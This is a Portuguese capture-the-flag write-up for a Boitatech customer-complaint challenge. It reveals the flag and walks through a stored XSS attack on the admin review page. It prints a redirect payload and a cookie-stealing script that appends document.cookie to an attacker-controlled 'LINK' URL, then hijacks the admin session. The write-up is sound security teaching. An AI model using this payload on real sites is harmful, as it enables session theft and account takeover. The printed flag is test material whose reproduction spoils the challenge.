A Boitatech criou uma área de SAC! Fique a vontade para fazer suas reclamações =)
Formato da flag: BCTF{xxx}
BCTF{XSS_S3sS10n_H1J4cK1nG!!!}
Nesse desafio, somos apresentados a uma tela de serviço de atendimento ao cliente (SAC), onde o usuário pode enviar um texto a administração do Boitatech.
Fazendo uma análise do conteúdo da página, o texto “O administrador irá verificar sua reclamação mais tarde!” nos permite inferir que o objetivo desse desafio é induzir um XSS na página do administrador para roubar a sua sessão. Assim, podemos tentar montar um script para conseguir os Cookie do administrador. Assim:
<script>window.location.href="LINK"</script>Enviando esse payload para o servidor, podemos observar que temos uma resposta:
Nessa resposta, percebemos que já temos um XSS na página do administrador. Agora só precisamos pegar os cookies e ownar a sessão. Com o payload:
<script>window.location.href="LINK/" + document.cookie</script>Podemos receber a resposta do servidor contendo os cookies do administrador. Assim, enviando esse payload, temos a seguinte resposta:
Substituindo o cookie que conseguimos em nosso navegador, podemos obter a flag com sucesso:
